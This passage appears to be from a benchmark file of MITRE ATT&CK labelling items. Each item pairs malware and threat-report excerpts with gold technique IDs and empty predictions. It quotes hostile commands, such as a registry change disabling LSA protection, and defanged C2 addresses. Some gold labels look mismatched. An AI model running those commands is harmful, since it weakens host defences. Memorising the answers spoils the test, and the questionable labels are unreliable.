distributions\n\t - T1068: Exploitation for Privilege Escalation\n- Text: The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).\n\t - T1203: Exploitation for Client Execution\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n\t - T1587.004: Develop Capabilities - Exploits\n\t - T1499.004: Endpoint Denial of Service - Application or System Exploitation\n\t - T1190: Exploit Public-Facing Application\n\t - T1210: Exploitation of Remote Services\n\t - T1588.005: Obtain Capabilities - Exploits\n", "input": "\nExploits CVE-2017-0143, SMB exploit CVE-2017-0146, SMB exploit These 2 exploits are EternalBlue/Doublepulsar and are used to drop the Stage1 Dropper onto a system.\u00a0 Installation The Gh0stRAT dropper arrives on a PC through the use of EternalBlue/DoublePulsar.\u00a0 Once on a victim\u2019s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory.\u00a0 It then passes the config buffer to the extracted DLL and calls the exported function (Shellex) [Screenshot 2] The mainthread of the code.\u00a0 Note the call at the bottom that calls Shellex Gh0stRAT dll functionality An important note:\u00a0 In its base state, this sample is damaged, therefore it will not install its services properly.\u00a0 However, as the service information is included, I will list it anyways.\u00a0 Additionally, samples downloaded from its distribution server DO install correctly,\u00a0 and are downloaded during the base dll\u2019s runtime", "gold": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- T1574.002: Hijack Execution Flow - DLL Side-Loading\n- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1036: Masquerading\n- Text: Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: Launchd [T1053.004\n\t - T1106: Native API\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1053.003: Scheduled Task/Job - Cron\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\npersists through a scheduled task that executes it every minute.", "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: scans processes on all victim systems in the environment and uses automated scripts to pull back the results.\n\t - T1064: Scripting\n\t - T1119: Automated Collection\n- Text: CosmicDuke exfiltrates collected files automatically over FTP to remote servers.\n\t - T1020: Automated Exfiltration\n- Text: Clambling can collect information from a compromised host.\n\t - T1005: Data from Local System\n", "input": "\nautomatically collects data about the victim and sends it to the control server.", "gold": "- T1119: Automated Collection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Axiom has used spear phishing to initially compromise victims.\n\t - T1566: Phishing\n- Text: AppleJeus has required user execution of a malicious MSI installer.\n\t - T1204.002: User Execution - Malicious File\n- Text: As seen in Figure 2, the VBA code builds the email body and attaches the malicious document to the email. We\u2019ve seen both .docx and .lnk files being used as attachments. These are very similar to the content of the malicious attachments used in Gamaredon\u2019s initial spearphishing campaigns. Figure 3 shows an email generated by this malicious component\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nsent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded.\n\t - T1204.002: User Execution - Malicious File\n- Text: APT30 has used spearphishing emails with malicious DOC attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]//petshopbook[.]com\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nAttack Overview The attack starts with Microsoft Word documents containing a malicious VBA macro being attached to spear phishing emails", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.\n\t - T1542.003: Pre-OS Boot - Bootkit\n- Text: APT41 deployed rootkits on Linux systems.\n\t - T1014: Rootkit\n- Text: master boot record wiper\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n", "input": "\nSome variants incorporate an MBR rootkit.", "gold": "- T1542.003: Pre-OS Boot - Bootkit", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can upload files from compromised hosts.\n\t - T1005: Data from Local System\n- Text: During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.\n\t - T1119: Automated Collection\n- Text: Emails dating more than three years prior to malware execution have been included in the collected EmailStorage folder, meaning that there may not be a date limit for the email enumerator. There is a lack of keywords or other limiting pattern by which specific email messages in local mailboxes were targeted for exfiltration. Kroll has identified instances where specific email messages were deleted within the EmailStorage folder. In some instances, the entire EmailStorage folder is deleted once messages have all been exfiltrated. Based on observed cases, there was no evidence that attachments were included in the collected data. Kroll collaborators at the National Cyber Forensics Training Alliance (NCFTA) observed Qakbot samples sending SMTP traffic indicative of outbound spam thread hijackings\n\t - T1074.001: Data Staged - Local Data Staging\n", "input": "\ncollects files from the local system.", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has used mshta.exe to run malicious scripts and download programs.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.\n\t - T1220: XSL Script Processing\n- Text: Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nhas a VBScript for execution.", "gold": "- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1112: Modify Registry\n- Text: SUNBURST checked for a variety of antivirus/endpoint detection agents prior to execution.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Magic Hound has disabled LSA protection on compromised hosts using `\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.\n\t - T1562: Impair Defenses\n", "input": "\nEnterprises can benefit from Trend Micro\u2019s\u00a0Smart Protection Suites\u00a0with XGen security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The VB.NET variant then gathers system information and running processes like other Zebrocy variants by running the following commands: systeminfo & tasklist The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://109.248.148[.]42/agr-enum/progress-inform/cube.php?res=[serial number] The VB.NET variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows (notice the spaces before and after ampersand \u201c&\u201d): data=[system information and running processes] & arg=[screenshot in BMP format] C# Zebrocy Variant The C# variant of Zebrocy is similar to other variants in functionality, but also has several unique attributes that are worth discussing\n\t - T1082: System Information Discovery\n\t - T1057: Process Discovery\n\t - T1132: Data Encoding\n- Text: collects information on network settings and Internet proxy settings from the victim.\n\t - T1016: System Network Configuration Discovery\n- Text: Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective\n\t - T1049: System Network Connections Discovery\n", "input": "\nThe main purpose of the IGT tool is to make an inventory of the system, saving information from the network interfaces and addresses, credentials belonging to the Domain and database server, services being run from the OS and everything that could help the Poseidon Group make its attack more customized to its victim", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.\n\t - T1571: Non-Standard Port\n- Text: BADCALL uses a FakeTLS method during C2.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nuses HTTP/HTTPS for command and control communication.", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: STARWHALE has the ability to hex-encode collected data from an infected host.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: ShadowPad has encoded data as readable Latin characters.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: The data field within the message is a string of custom base64 encoded data that the malware decodes using the same custom base64 routine mentioned earlier and decrypts it using AES and the pre-shared key\n\t - T1573: Encrypted Channel\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1132: Data Encoding\n", "input": "\nFor instance, the following 15 bytes were used to generate an HTTP parameter during our analysis: Random Value Constant Value agent_id 0F EE C8 83 56 0E 9F F0 EB 98 43 30 30 30 30 The resulting ciphertext is then encoded using XAgent\u2019s base64 encoding routine that starts by building the following encoding alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_ As you can see, this is not the standard base64 alphabet, rather it is the \u201cURL and Filename safe\u201d Base 64 Alphabet from RFC 4648, as the \u201c+\u201d in the standard alphabet is replaced with \u201c-\u201d and the \u201c/\u201d replaced with \u201c_\u201d", "gold": "- T1027: Obfuscated Files or Information\n- T1132: Data Encoding", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: opens a backdoor on TCP ports 6868 and 7777.\n\t - T1571: Non-Standard Port\n- Text: FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nversion of communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string \u201c&&&\u201d", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: creates a backdoor through which remote attackers can retrieve lists of running processes.\n\t - T1057: Process Discovery\n- Text: BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules.\n\t - T1129: Shared Modules\n- Text: The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using: cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL All the following capabilities described are implemented by the malicious service DLL implant unless specified.\u00a0\u00a0 Variant using North Korean Red Cross Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key\n\t - T1055: Process Injection\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", "input": "\ncreates a backdoor through which remote attackers can monitor processes.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key \u201c78563412\u201d. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2\n\t - T1082: System Information Discovery\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network\n\t - T1595: Active Scanning\n\t - T1592: Gather Victim Host Information\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n", "input": "\nhas a command to collect victim system information, including the system name and OS version.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Smoke Loader injects into the Internet Explorer process.\n\t - T1055: Process Injection\n- Text: FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: BazarLoader is Windows-based malware spread through various methods involving email\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1534: Internal Spearphishing\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - T1566: Phishing\n", "input": "\nThese documents contained malicious OLE objects used to drop binaries.This time, however, they contained malicious OLE (Object Link Embedded) objects.Initial analysis confirmed two similarly sized OLE object files within this document which appeared to be the same from an execution point of view.The two dropped binaries were stored and executed in this location during our analysis:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (2).exeC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (3).exeInitial analysis showed some sloppy cleaning up from Group123, which we used later to determine that separate campaigns were the work of this same actor, as compilation artifacts remained within the binaries:e:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdbThe second stage of the dropped binaries was used to execute wscript.exe while injecting shellcode into this process", "gold": "- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can explore files on a compromised system.\n\t - T1083: File and Directory Discovery\n- Text: Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.\n\t - T1025: Data from Removable Media\n- Text: ccf32 can be used to automatically collect files from a compromised host.\n\t - T1119: Automated Collection\n", "input": "\ncan list directory contents.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pysa can perform network reconnaissance using the Advanced Port Scanner tool.\n\t - T1046: Network Service Discovery\n- Text: Conti can enumerate routine network connections from a compromised host.\n\t - T1049: System Network Connections Discovery\n- Text: APT29 has used AdFind to enumerate remote systems.\n\t - T1018: Remote System Discovery\n", "input": "\nthe victim's internal network for hosts with ports 8080, 5900, and 40 open.", "gold": "- T1046: Network Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Imminent Monitor has uploaded a file containing debugger logs, network information and system information to the C2.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Taidoor uses RC4 to encrypt the message body of HTTP content.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nhas used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Grandoreiro can determine the time on the victim machine via IPinfo.\n\t - T1124: System Time Discovery\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: QuasarRAT can determine the country a victim host is located in.\n\t - T1614: System Location Discovery\n", "input": "\ncan obtain the victim time zone.", "gold": "- T1124: System Time Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerSploit's \"Install-SSP\" Persistence module can be used to establish by installing a SSP DLL.\n\t - T1547.005: Boot or Logon Autostart Execution - Security Support Provider\n- Text: In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen\n\t - T1087.001: Account Discovery - Local Account\n\t - T1098: Account Manipulation\n\t - T1136.001: Create Account - Local Account\n\t - T1564.002: Hide Artifacts - Hidden Users\n", "input": "\nThe credential dumper contains an implementation of an SSP.", "gold": "- T1547.005: Boot or Logon Autostart Execution - Security Support Provider", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DustySky can compress files via RAR while staging data to be exfiltrated.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: BADFLICK has compressed data using the aPLib compression library.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.\n\t - T1560: Archive Collected Data\n", "input": "\nhas used RAR to compress, encrypt, and password-protect files prior to exfiltration.", "gold": "- T1560: Archive Collected Data\n- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KeyBoy installs a service pointing to a malicious DLL dropped to disk.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries.\n\t - T1569.002: System Services - Service Execution\n- Text: Fysbis has masqueraded as the rsyncd and dbus-inotifier services.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", "input": "\nIn one instance, added as a service with a display name of \"Corel Writing Tools Utility.\"", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Remsec can dump the SAM database.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - 